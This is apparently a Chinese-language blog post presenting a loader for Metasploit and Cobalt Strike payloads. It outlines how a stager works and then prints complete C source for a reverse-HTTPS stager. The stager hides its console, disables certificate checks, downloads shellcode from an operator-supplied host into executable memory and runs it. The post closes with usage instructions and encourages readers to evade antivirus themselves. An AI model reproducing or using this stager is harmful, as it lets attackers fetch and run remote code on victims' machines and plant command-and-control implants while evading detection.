一个msf和cobalt strike 都可以使用的loader

了解stager

借用msf的来说,看这 https://xz.aliyun.com/t/1709/
1.连接到处理程序
2.读取4字节长度
3.分配长度字节缓冲区
4.将其标记为可写和可执行(在Windows上,您需要VirtualProtect用于此)
5.将长度字节读入该缓冲区
6.跳转到缓冲区。在C中执行此操作的最简单方法是将其强制转换为函数指针并调用它。

通俗讲就是建立链接,接收dll,然后反射dll注入

msf与cobalt strike使用Reflective DLL Injection

附上一段https stager

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
来自:https://github.com/peacand/msf-av-escape/blob/master/reverse_https/main_https.c
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <wininet.h>

#define HTTP_OPEN_FLAGS 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000
/*
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00000200 | ; INTERNET_FLAG_NO_UI
;0x00800000 | ; INTERNET_FLAG_SECURE
;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
;0x00001000 ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
*/

#define OPTIONS_SECURITY_FLAGS 0x00003380
/*
;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
*/

int main(int argc, char * argv[]) {
char * stage;
void(*stage_main)();
HINTERNET hInternet;
HINTERNET hHttpSession;
HINTERNET hHttpRequest;
int httpflags = OPTIONS_SECURITY_FLAGS;
int recv_tmp = 0, recv_tot = 0;
char *stage_index = NULL;

/* We dont want the console prompt at screen */
FreeConsole();

/* Even it its SSL encrypted, lets set a User Agent, looks better :-) */
hInternet = InternetOpen("User-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)", 0, NULL, NULL, 0);
hHttpSession = InternetConnect(hInternet, argv[1], atoi(argv[2]), NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
/* URL format is *important*, don't change it ! It tells what kind of payload (Native, Python, Java ..) is going to be injected afterwords */
hHttpRequest = HttpOpenRequest(hHttpSession, "GET", "/1f7MA", "HTTP/1.1", NULL, NULL, HTTP_OPEN_FLAGS, 0);
/* Set SSL options to the HTTP request */
InternetSetOption(hHttpRequest, INTERNET_OPTION_SECURITY_FLAGS, &httpflags, 4);
HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);

/* We got the payload, lets allocate a big chunk of memory in RWX to put the whole thing in */
stage = VirtualAlloc(0, 0x00400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

/* Read the payload from the previous http request and put it in our buffer */
recv_tmp = 1;
recv_tot = 0;
stage_index = stage;

while (recv_tmp > 0) {
InternetReadFile(hHttpRequest, stage_index, 8192, (PDWORD)&recv_tmp);
recv_tot += recv_tmp;
stage_index += recv_tmp;
}

/* Just jump at the beginning of the buffer */
stage_main = (void(*)())stage;
stage_main();

/* We dont have to care about it, but anyway .. */
InternetCloseHandle(hHttpSession);
InternetCloseHandle(hInternet);

return 0;
}

自行编译
Usage:xxoo.exe ip port

什么,你说过不了杀毒? 自己动手做咯,又不难~